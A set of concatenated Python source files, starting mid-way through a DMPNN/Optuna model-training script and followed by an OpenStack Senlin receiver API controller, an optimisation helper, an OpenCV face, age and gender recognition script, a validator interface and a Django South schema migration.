min_epochs=(epochs_per_cycle + 1) * 3,
gpus=4,
num_nodes=1,
logger=False,
checkpoint_callback=True,
callbacks=callbacks,
progress_bar_refresh_rate=1 if args.jobs==1 else 0,
precision=16,
amp_backend="native",
amp_level="O2",
default_root_dir=model_dir,
weights_summary="full",
accelerator="dp",
)
trainer.fit(model, data)
model.freeze()
return model
def train(args: argparse.Namespace) -> Tuple[pytorch_lightning.LightningModule, float]:
"""
[summary]
Parameters
----------
args : argparse.Namespace
[description]
Returns
-------
float
[description]
"""
model_dir = f"{args.study_name}/{args.model_name}"
if not os.path.exists(model_dir):
os.mkdir(model_dir)
models = []
for cv in range(args.cv):
reps = []
for rep in range(3):
data = GraphsDataModule(hparams=args, cv=cv)
steps_per_epoch = int(data.get_train_len() / args.batch_size)
epochs_per_cycle = int(args.lr_cycle_size / steps_per_epoch)
early_stopping = EarlyStopping(monitor="val_loss", min_delta=1e-3, patience=epochs_per_cycle + 1)
model = GraphNetworkLigthning(hparams=args)
trainer = Trainer.from_argparse_args(args,
auto_select_gpus=True,
max_epochs=args.max_epochs,
# min_steps=args.lr_cycle_size*3,
min_epochs=(epochs_per_cycle + 1) * 3,
gpus=4,
num_nodes=1,
logger=False,
checkpoint_callback=True,
callbacks=[early_stopping, ],
# gradient_clip_val=0.5,
# val_check_interval= min(1.0, 500.0 * args.batch_size / len(data)),
progress_bar_refresh_rate=1 if args.jobs==1 else 0,
precision=16,
amp_backend="native",
amp_level="O2",
default_root_dir=model_dir,
weights_summary=None,
accelerator="dp",
)
trainer.fit(model, data)
trained_model = model._net.eval()
cv_score = early_stopping.best_score.cpu().detach()
reps.append((trained_model, cv_score))
# keep top 1 of 3 initializations
best_rep = sorted(reps, key=lambda k: k[1])[0]
models.append(best_rep[0])
ensemble = GraphNetworkEnsembleLightning(models, model._loss, args.target_col)
ensemble.freeze()
torch.save(ensemble._net.cpu().eval(), f"{model_dir}/{args.model_name}.ensemble.ckpt")
data.setup(stage="test")
test_score = trainer.test(model=ensemble, test_dataloaders=data.test_dataloader(), verbose=False)
test_score = test_score[0]['test_loss']
return ensemble, test_score
def objective(trial: optuna.Trial, prog_args: argparse.Namespace) -> float:
"""
[summary]
Parameters
----------
trial : optuna.Trial
[description]
prog_args : argparse.Namespace
[description]
Returns
-------
float
[description]
"""
prog_args = vars(prog_args)
hparams = {
'model_name': f"trial-{trial.number}",
'model_index': trial.number,
'learning_rate': trial.suggest_loguniform("learning_rate", 5e-5, 5e-3),
'lr_cycle_size' : trial.suggest_int("graph_depth", 100, 1000),
'batch_size': trial.suggest_int('batch_size', 32 ,256, log=True),
'beta1': trial.suggest_loguniform("beta1", 0.5, 0.999),
'beta2': trial.suggest_loguniform("beta2", 0.9, 0.999),
'gamma': trial.suggest_uniform("gamma", 0.8, 0.9),
'dropout': trial.suggest_uniform("dropout", 0.1, 0.5),
'weight_decay': trial.suggest_loguniform("weight_decay", 0.001, 0.1),
'hidden_size': trial.suggest_int('hidden_size', 8 , 32, log=True),
'graph_depth': trial.suggest_int("graph_depth", 1, 3),
'fc_depth': trial.suggest_int("fc_depth", 1, 3),
'output_size': len(prog_args["target_col"]),
}
hparams.update(prog_args)
args=argparse.Namespace(**hparams)
# trinaing a model with these params
model_dir = f"{args.study_name}/hyperopt/{args.model_name}"
if not os.path.exists(model_dir):
os.mkdir(model_dir)
# use the biggest cross validation training set
data = GraphsDataModule(hparams=args, cv=args.cv-1)
pruner = optuna.integration.PyTorchLightningPruningCallback(trial, monitor="val_loss")
model = train_single_model(args, data, model_dir, pruner=pruner)
data.setup(stage="test")
test_score = trainer.test(model=model, test_dataloaders=data.test_dataloader(), verbose=False)
test_score = test_score[0]['test_loss']
return test_score
def setup_study(args: argparse.Namespace) -> optuna.study.Study:
"""
[summary]
Parameters
----------
args : argparse.Namespace
[description]
Returns
-------
optuna.study.Study
[description]
"""
# generate the study folder
logger.info(f"Setting up study directory: {args.study_name}")
if not os.path.exists(args.study_name):
os.mkdir(args.study_name)
if not os.path.exists(f"{args.study_name}/hyperopt"):
os.mkdir(f"{args.study_name}/hyperopt")
sys.stderr = open(f'{args.study_name}/errors.log', 'w')
# save the splits for cross validation
logger.info("Reading data...")
if not os.path.isfile(f"{args.study_name}/study.db"):
data = pandas.read_csv(args.data_file)#.sample(frac=args.overfit)
data_fileroot = os.path.basename(args.data_file)
logger.info("Scaffold-aware CV splitting:")
splitter = ScaffoldSplitter(data[args.smiles_col], k=args.cv)
train_splits, test_split = splitter.get_splits()
logger.info(f"\t-Test: {len(test_split):6} structures.")
data.iloc[test_split].to_csv(f"{args.study_name}/{data_fileroot}.test")
for i, split in enumerate(train_splits):
train_split = split["train"]
valid_split = split["valid"]
logger.info(f"\t-Training #{i}: {len(train_split):6} structures.")
logger.info(f"\t-Validation #{i}: {len(valid_split):6} structures.")
data.iloc[train_split].to_csv(f"{args.study_name}/{data_fileroot}.train.{i}")
data.iloc[valid_split].to_csv(f"{args.study_name}/{data_fileroot}.valid.{i}")
GraphsDataModule(hparams=args, cv=i).prepare_data()
else:
logger.info("Using pre-generated datasets and splits...")
study_sampler = optuna.samplers.CmaEsSampler(restart_strategy = 'ipop',
warn_independent_sampling=False)
study_pruner = optuna.pruners.HyperbandPruner(min_resource=1, max_resource='auto', reduction_factor=3)
study = optuna.create_study(study_name=args.study_name,
storage=f'sqlite:///{args.study_name}/study.db',
load_if_exists=True,
direction="minimize",
sampler=study_sampler,
pruner=study_pruner)
return study
# def train_graph_explainer(args):
# for i, property_name in enumerate(args.target_col):
# model = ExplainerNetworkLightning(task=args.task, property_index=i)
# data = GraphsDataModule(hparams=args, cv=0)
# early_stopping = EarlyStopping(monitor="val_loss", patience=5)
# trainer = Trainer(gpus=1,
# logger=False,
# checkpoint_callback=False,
# callbacks=[early_stopping,],
# progress_bar_refresh_rate=1,
# weights_summary=None)
# trainer.fit(model, data)
# trained_model = model._net.eval()
# trained_model_file = f"{args.study_name}/graph_{property_name}_explainer.ckpt"
# torch.save(trained_model.cpu(), trained_model_file)
# return
def main() -> None:
"""
[summary]
"""
logger.info("***************")
logger.info("** GSK-DMPNN **")
logger.info("***************")
parser = argparse.ArgumentParser(prog="GSK-DMPNN",
description='Automatically trains an optimal DMPNN ensemble model for QSAR purposes.',
epilog="*** End of optimization ***")
parser.add_argument("--num_trials", default=10, type=int, help="""Number of hyperparameter optimization rounds to execute.
Each trial trains a number of models equal to the square
of the cross validation parameter.""")
parser.add_argument("--study_name", default="study", type=str, help="The name of the optimization study. A directory will be created")
parser.add_argument("--cv", default=3, type=int, help="The number of scaffold aware cross-validation folds and repeats.")
parser.add_argument('--task', choices=["regression", "classification"], type=str, help="What task to train the model on.")
parser.add_argument('--max_epochs', default=100, type=int, help="Maximum epochs.")
parser.add_argument("--jobs", type=int, default=1, help="The number of available gpus")
parser.add_argument("--lr_cycle_size", default=2000, type=int, help="LR is cycled every N iterations.")
parser.add_argument("--extra", default=None, nargs="+", type=str, help="Extra feaures generators.")
# give the module a chance to add own params
parser = GraphsDataModule.add_data_specific_args(parser)
args = parser.parse_args()
study = setup_study(args)
study.optimize(lambda trial : objective(trial, args),
n_trials=args.num_trials,
timeout=48*60*60,
n_jobs=args.jobs,
catch=(RuntimeError, ))
fig = optuna.visualization.plot_param_importances(study)
fig.write_image(f'{args.study_name}/importances.svg')
fig = optuna.visualization.plot_optimization_history(study)
fig.write_image(f'{args.study_name}/history.svg')
trial = study.best_trial
logger.info(f"Number of finished trials: {len(study.trials)}")
logger.info(f"Best trial: {trial.number}")
logger.info(f"\tValue: {trial.value}")
logger.info("\tParams: ")
for key, value in trial.params.items():
logger.info(f"\t\t{key}: {value}")
print(study.trials_dataframe())
# best_model_file = f"{args.study_name}/trial-{trial.number}/trial-{trial.number}.ensemble.ckpt"
# shutil.copyfile(best_model_file, f"{args.study_name}/best_model.ckpt")
# study.trials_dataframe().to_csv(f"{args.study_name}/study_results.csv")
# train_graph_explainer(args)
return None
if __name__ == '__main__':
# run the code
main()
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Receiver endpoint for Senlin v1 REST API.
"""
from webob import exc
from senlin.api.common import util
from senlin.api.common import wsgi
from senlin.common import consts
from senlin.common.i18n import _
class ReceiverController(wsgi.Controller):
"""WSGI controller for receiver resource in Senlin v1 API."""
REQUEST_SCOPE = 'receivers'
@util.policy_enforce
def index(self, req):
whitelist = {
consts.RECEIVER_NAME: 'mixed',
consts.RECEIVER_TYPE: 'mixed',
consts.RECEIVER_CLUSTER_ID: 'mixed',
consts.RECEIVER_USER_ID: 'mixed',
consts.RECEIVER_ACTION: 'mixed',
consts.PARAM_LIMIT: 'single',
consts.PARAM_MARKER: 'single',
consts.PARAM_SORT: 'single',
consts.PARAM_GLOBAL_PROJECT: 'single',
}
for key in req.params.keys():
if key not in whitelist.keys():
raise exc.HTTPBadRequest(_('Invalid parameter %s') % key)
params = util.get_allowed_params(req.params, whitelist)
project_safe = not util.parse_bool_param(
consts.PARAM_GLOBAL_PROJECT,
params.pop(consts.PARAM_GLOBAL_PROJECT, False))
params['project_safe'] = project_safe
obj = util.parse_request('ReceiverListRequest', req, params)
receivers = self.rpc_client.call(req.context, 'receiver_list', obj)
return {'receivers': receivers}
@util.policy_enforce
def create(self, req, body):
obj = util.parse_request(
'ReceiverCreateRequest', req, body, 'receiver')
result = self.rpc_client.call(req.context, 'receiver_create',
obj.receiver)
return {'receiver': result}
@util.policy_enforce
def get(self, req, receiver_id):
obj = util.parse_request(
'ReceiverGetRequest', req, {'identity': receiver_id})
receiver = self.rpc_client.call(req.context, 'receiver_get', obj)
return {'receiver': receiver}
@util.policy_enforce
def update(self, req, receiver_id, body):
receiver_data = body.get('receiver', None)
if receiver_data is None:
raise exc.HTTPBadRequest(_("Malformed request data, missing "
"'receiver' key in request body."))
kwargs = receiver_data
kwargs['identity'] = receiver_id
obj = util.parse_request('ReceiverUpdateRequest', req,
kwargs)
receiver = self.rpc_client.call(req.context, 'receiver_update', obj)
return {'receiver': receiver}
@util.policy_enforce
def delete(self, req, receiver_id):
obj = util.parse_request(
'ReceiverDeleteRequest', req, {'identity': receiver_id})
self.rpc_client.call(req.context, 'receiver_delete', obj)
raise exc.HTTPNoContent()
@util.policy_enforce
def notify(self, req, receiver_id, body=None):
obj = util.parse_request(
'ReceiverNotifyRequest', req, {'identity': receiver_id})
self.rpc_client.call(req.context, 'receiver_notify', obj)
raise exc.HTTPNoContent()
|
import numpy as np
import scipy as sp
import scipy.optimize
def analytic_center(A,b,eps,x0,method='nelder-mead'):
'''
Input:
- A -- N x M
- b -- N
- eps -- N
- x0 -- M
Output is a scipy OptimizeResult for
max np.sum(eps*log(b-A@x))
optimized using x0 as a starting point
'''
def func(x):
if ((b-A@x)<=0).any():
return np.inf
return -np.sum(eps*np.log(b-A@x))
def jac(x):
return A.T@(eps/(b-A@x))
if method=='nelder-mead':
return sp.optimize.minimize(func,x0,method=method)
else:
return sp.optimize.minimize(func,x0,jac=jac,method=method)
def construct_reasonable_rectangle_problem(affines,epsilon=.1,maxsize=300):
affines=np.require(affines).astype(float)
n=affines.shape[0]
assert affines.shape==(n,n)
maxsize=np.require(maxsize).astype(float)
if maxsize.shape==():
maxsize=np.ones(n)*maxsize
hopefully_feasible=np.ones(n)*5
affines=np.sign(np.sum(affines,axis=1,keepdims=True)) * affines
A=np.concatenate([
-np.eye(n), # -x <=0
affines, # A@x < 1
np.eye(n), # x < maxsize
],axis=0)
b=np.concatenate([
np.zeros(n),
np.ones(n),
maxsize
],axis=0)
if not (A@hopefully_feasible<b).all():
raise ValueError("affine transformation is too big, try another method")
eps=np.r_[np.ones(n),np.ones(2*n)*epsilon]
return A,b,eps,hopefully_feasible
def calc_reasonable_rectangles(affines,epsilon=.01,maxsize=300):
'''
Input
- affines -- N
- epsilon -- scalar
- maxsize -- scalar or N
Output
- rectangle -- N, integer
Finds a reasonably large value of rectangle so that
(np.abs(affines@rectangle)<1).all()
(rectangle<maxsize).all()
We do this in two steps. First, we get all the
affines pointing in the same direction.
affines=np.sign(np.sum(affines,axis=1,keepdims=True)) * affines
and then solving the optimization problem
max_rectangle
np.sum(np.log(rectangle))
+ epsilon*np.sum(np.log(maxsize-rectangle))
+ epsilon*np.sum(np.log(b-affines@rectangle))
'''
A,b,eps,hopefully_feasible = construct_reasonable_rectangle_problem(
affines,epsilon,maxsize
)
rez=analytic_center(A,b,eps,hopefully_feasible,method='nelder-mead')
return np.floor(rez['x']).astype(int)
|
# import the necessary packages
from imutils.video import VideoStream
from imutils.video import FPS
import numpy as np
import argparse
import pickle
import imutils
import time
import math
import cv2
import os
class RecognizeFaceGenderAge(object):
def __init__(self):
# construct the argument parser and parse the arguments
self.ap = argparse.ArgumentParser()
self.ap.add_argument("-d", "--detector", required=True,
help="path to OpenCV's deep learning face detector")
self.ap.add_argument("-m", "--embedding-model", required=True,
help="path to OpenCV's deep learning face embedding model")
self.ap.add_argument("-r", "--recognizer", required=True,
help="path to model trained to recognize faces")
self.ap.add_argument("-l", "--le", required=True,
help="path to label encoder")
self.ap.add_argument("-c", "--confidence", type=float, default=0.5,
help="minimum probability to filter weak detections")
self.ap.add_argument('--input', help='Path to input image or video file.')
self.ap.add_argument("--device", default="cpu", help="Device to inference on")
self.args = vars(self.ap.parse_args())
self.faceProto = "opencv_face_detector.pbtxt"
self.faceModel = "opencv_face_detector_uint8.pb"
self.ageProto = "age_deploy.prototxt"
self.ageModel = "age_net.caffemodel"
self.genderProto = "gender_deploy.prototxt"
self.genderModel = "gender_net.caffemodel"
self.MODEL_MEAN_VALUES = (78.4263377603, 87.7689143744, 114.895847746)
self.ageList = ['(0-2)', '(4-6)', '(8-12)', '(15-20)', '(25-32)', '(38-43)', '(48-53)', '(60-100)']
self.genderList = ['Male', 'Female']
# load our serialized face detector from disk
print("[INFO] loading face detector...")
self.protoPath = os.path.sep.join([self.args["detector"], "deploy.prototxt"])
self.modelPath = os.path.sep.join([self.args["detector"],
"res10_300x300_ssd_iter_140000.caffemodel"])
self.detector = cv2.dnn.readNetFromCaffe(self.protoPath, self.modelPath)
# load our serialized face embedding model from disk
print("[INFO] loading face recognizer...")
self.embedder = cv2.dnn.readNetFromTorch(self.args["embedding_model"])
# load the actual face recognition model along with the label encoder
self.recognizer = pickle.loads(open(self.args["recognizer"], "rb").read())
self.le = pickle.loads(open(self.args["le"], "rb").read())
# Load network
self.ageNet = cv2.dnn.readNet(self.ageModel, self.ageProto)
self.genderNet = cv2.dnn.readNet(self.genderModel, self.genderProto)
self.faceNet = cv2.dnn.readNet(self.faceModel, self.faceProto)
def setBackend(self):
if self.args["device"] == "cpu":
self.ageNet.setPreferableBackend(cv2.dnn.DNN_TARGET_CPU)
self.genderNet.setPreferableBackend(cv2.dnn.DNN_TARGET_CPU)
self.faceNet.setPreferableBackend(cv2.dnn.DNN_TARGET_CPU)
print("Using CPU device")
elif self.args["device"] == "gpu":
self.ageNet.setPreferableBackend(cv2.dnn.DNN_BACKEND_CUDA)
self.ageNet.setPreferableTarget(cv2.dnn.DNN_TARGET_CUDA)
self.genderNet.setPreferableBackend(cv2.dnn.DNN_BACKEND_CUDA)
self.genderNet.setPreferableTarget(cv2.dnn.DNN_TARGET_CUDA)
self.faceNet.setPreferableBackend(cv2.dnn.DNN_BACKEND_CUDA)
self.faceNet.setPreferableTarget(cv2.dnn.DNN_TARGET_CUDA)
print("Using GPU device")
def videostream(self):
# initialize the video stream, then allow the camera sensor to warm up
print("[INFO] starting video stream...")
vs = VideoStream(src=0).start()
time.sleep(2.0)
# start the FPS throughput estimator
fps = FPS().start()
while True:
# grab the frame from the threaded video stream
frame = vs.read()
# resize the frame to have a width of 600 pixels (while
# maintaining the aspect ratio), and then grab the image
# dimensions
frame = imutils.resize(frame, width=600)
(h, w) = frame.shape[:2]
# construct a blob from the image
imageBlob = cv2.dnn.blobFromImage(
cv2.resize(frame, (300, 300)), 1.0, (300, 300),
(104.0, 177.0, 123.0), swapRB=False, crop=False)
# apply OpenCV's deep learning-based face detector to localize
# faces in the input image
self.detector.setInput(imageBlob)
detections = self.detector.forward()
# loop over the detections
for i in range(0, detections.shape[2]):
# extract the confidence (i.e., probability) associated with
# the prediction
confidence = detections[0, 0, i, 2]
# filter out weak detections
if confidence > self.args["confidence"]:
# compute the (x, y)-coordinates of the bounding box for
# the face
box = detections[0, 0, i, 3:7] * np.array([w, h, w, h])
(startX, startY, endX, endY) = box.astype("int")
# extract the face ROI
face = frame[startY:endY, startX:endX]
(fH, fW) = face.shape[:2]
# ensure the face width and height are sufficiently large
if fW < 20 or fH < 20:
continue
# construct a blob for the face ROI, then pass the blob
# through our face embedding model to obtain the 128-d
# quantification of the face
faceBlob = cv2.dnn.blobFromImage(face, 1.0 / 255,
(96, 96), (0, 0, 0), swapRB=True, crop=False)
blob = cv2.dnn.blobFromImage(face, 1.0, (227, 227),
self.MODEL_MEAN_VALUES, swapRB=False)
self.embedder.setInput(faceBlob)
self.genderNet.setInput(blob)
vec = self.embedder.forward()
genderPreds = self.genderNet.forward()
gender = self.genderList[genderPreds[0].argmax()]
self.ageNet.setInput(blob)
agePreds = self.ageNet.forward()
age = self.ageList[agePreds[0].argmax()]
label = "{}, age:{}".format(gender, age)
print("Gender : {}, conf = {:.3f}".format(gender, genderPreds[0].max()))
print("Age Output : {}".format(agePreds))
print("Age : {}, conf = {:.3f}".format(age, agePreds[0].max()))
# perform classification to recognize the face
preds = self.recognizer.predict_proba(vec)[0]
j = np.argmax(preds)
proba = preds[j]
name = self.le.classes_[j]
# draw the bounding box of the face along with the
# associated probability
if proba > 0.6:
text = "{}: {:.2f}%".format(name, proba * 100)
y = startY - 10 if startY - 10 > 10 else startY + 10
cv2.rectangle(frame, (startX, startY), (endX, endY),
(0, 255, 0), 2)
cv2.putText(frame, text, (startX, y),
cv2.FONT_HERSHEY_SIMPLEX, 0.55, (0, 255, 0), 2)
else:
text = "Unknown Face Detected"
y = startY - 10 if startY - 10 > 10 else startY + 10
cv2.rectangle(frame, (startX, startY), (endX, endY),
(0, 0, 255), 2)
cv2.putText(frame, text, (startX, y),
cv2.FONT_HERSHEY_SIMPLEX, 0.45, (0, 0, 255), 2)
cv2.putText(frame, label, (startX, y-30),
cv2.FONT_HERSHEY_SIMPLEX, 0.8, (0, 255, 255), 2, cv2.LINE_AA)
# update the FPS counter
fps.update()
# show the output frame
cv2.imshow("Frame", frame)
key = cv2.waitKey(1) & 0xFF
# if the `q` key was pressed, break from the loop
if key == ord("q"):
break
# stop the timer and display FPS information
fps.stop()
print("[INFO] elasped time: {:.2f}".format(fps.elapsed()))
print("[INFO] approx. FPS: {:.2f}".format(fps.fps()))
# do a bit of cleanup
cv2.destroyAllWindows()
vs.stop()
if __name__ == '__main__':
try:
r = RecognizeFaceGenderAge()
r.setBackend()
r.videostream()
except cv2.error as e:
print(e)
|
import abc
import users.person as person
class PersonValidatorInterface(metaclass=abc.ABCMeta):
@classmethod
def __subclasshook__(cls, subclass):
return (hasattr(subclass, 'detect_user') and
callable(subclass.detect_user
) or
NotImplemented)
@abc.abstractmethod
def detect_user(self, image, people:list)->person.Person:
raise NotImplementedError
|
# -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'CanonicalFieldEntryLabel'
db.create_table(u'crowdataapp_canonicalfieldentrylabel', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('value', self.gf('django.db.models.fields.CharField')(max_length=50, null=True)),
('form_field', self.gf('django.db.models.fields.related.ForeignKey')(related_name='form_field', to=orm['crowdataapp.DocumentSetFormField'])),
))
db.send_create_signal(u'crowdataapp', ['CanonicalFieldEntryLabel'])
# Adding field 'DocumentSetFieldEntry.canonical_label'
db.add_column(u'crowdataapp_documentsetfieldentry', 'canonical_label',
self.gf('django.db.models.fields.related.ForeignKey')(to=orm['crowdataapp.CanonicalFieldEntryLabel'], null=True),
keep_default=False)
def backwards(self, orm):
# Deleting model 'CanonicalFieldEntryLabel'
db.delete_table(u'crowdataapp_canonicalfieldentrylabel')
# Deleting field 'DocumentSetFieldEntry.canonical_label'
db.delete_column(u'crowdataapp_documentsetfieldentry', 'canonical_label_id')
models = {
u'auth.group': {
'Meta': {'object_name': 'Group'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
u'auth.permission': {
'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
u'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
u'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'crowdataapp.canonicalfieldentrylabel': {
'Meta': {'object_name': 'CanonicalFieldEntryLabel'},
'form_field': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'form_field'", 'to': u"orm['crowdataapp.DocumentSetFormField']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'value': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True'})
},
u'crowdataapp.document': {
'Meta': {'object_name': 'Document'},
'document_set': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'documents'", 'to': u"orm['crowdataapp.DocumentSet']"}),
'entries_threshold_override': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '256', 'null': 'True'}),
'url': ('django.db.models.fields.URLField', [], {'max_length': "'512'"}),
'verified': ('django.db.models.fields.BooleanField', [], {'default': 'False'})
},
u'crowdataapp.documentset': {
'Meta': {'object_name': 'DocumentSet'},
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'entries_threshold': ('django.db.models.fields.IntegerField', [], {'default': '3'}),
'head_html': ('django.db.models.fields.TextField', [], {'default': '\'<!-- <script> or <link rel="stylesheet"> tags go here -->\'', 'null': 'True'}),
'header_image': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': "'128'"}),
'published': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'slug': ('django_extensions.db.fields.AutoSlugField', [], {'allow_duplicates': 'False', 'max_length': '50', 'separator': "u'-'", 'blank': 'True', 'populate_from': "'name'", 'overwrite': 'False'}),
'template_function': ('django.db.models.fields.TextField', [], {'default': "'// Javascript function to insert the document into the DOM.\\n// Receives the URL of the document as its only parameter.\\n// Must be called insertDocument\\n// JQuery is available\\n// resulting element should be inserted into div#document-viewer-container\\nfunction insertDocument(document_url) {\\n}\\n'"}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
},
u'crowdataapp.documentsetfieldentry': {
'Meta': {'object_name': 'DocumentSetFieldEntry'},
'canonical_label': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['crowdataapp.CanonicalFieldEntryLabel']", 'null': 'True'}),
'entry': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'fields'", 'to': u"orm['crowdataapp.DocumentSetFormEntry']"}),
'field_id': ('django.db.models.fields.IntegerField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'value': ('django.db.models.fields.CharField', [], {'max_length': '2000', 'null': 'True'}),
'verified': ('django.db.models.fields.BooleanField', [], {'default': 'False'})
},
u'crowdataapp.documentsetform': {
'Meta': {'object_name': 'DocumentSetForm'},
'button_text': ('django.db.models.fields.CharField', [], {'default': "u'Submit'", 'max_length': '50'}),
'document_set': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'form'", 'unique': 'True', 'to': u"orm['crowdataapp.DocumentSet']"}),
'email_copies': ('django.db.models.fields.CharField', [], {'max_length': '200', 'blank': 'True'}),
'email_from': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'email_message': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'email_subject': ('django.db.models.fields.CharField', [], {'max_length': '200', 'blank': 'True'}),
'expiry_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'intro': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'login_required': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'publish_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'response': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'send_email': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'sites': ('django.db.models.fields.related.ManyToManyField', [], {'default': '[1]', 'to': u"orm['sites.Site']", 'symmetrical': 'False'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '100'}),
'status': ('django.db.models.fields.IntegerField', [], {'default': '2'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
u'crowdataapp.documentsetformentry': {
'Meta': {'object_name': 'DocumentSetFormEntry'},
'document': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'form_entries'", 'null': 'True', 'to': u"orm['crowdataapp.Document']"}),
'entry_time': ('django.db.models.fields.DateTimeField', [], {}),
'form': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'entries'", 'to': u"orm['crowdataapp.DocumentSetForm']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']", 'null': 'True', 'blank': 'True'})
},
u'crowdataapp.documentsetformfield': {
'Meta': {'object_name': 'DocumentSetFormField'},
'autocomplete': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'choices': ('django.db.models.fields.CharField', [], {'max_length': '1000', 'blank': 'True'}),
'default': ('django.db.models.fields.CharField', [], {'max_length': '2000', 'blank': 'True'}),
'field_type': ('django.db.models.fields.IntegerField', [], {}),
'form': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'fields'", 'to': u"orm['crowdataapp.DocumentSetForm']"}),
'help_text': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'label': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'order': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'placeholder_text': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'required': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'default': "''", 'max_length': '100', 'blank': 'True'}),
'verify': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'visible': ('django.db.models.fields.BooleanField', [], {'default': 'True'})
},
u'crowdataapp.documentsetrankingdefinition': {
'Meta': {'object_name': 'DocumentSetRankingDefinition'},
'amount_rows_on_home': ('django.db.models.fields.IntegerField', [], {'default': '10', 'null': 'True'}),
'document_set': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'rankings'", 'to': u"orm['crowdataapp.DocumentSet']"}),
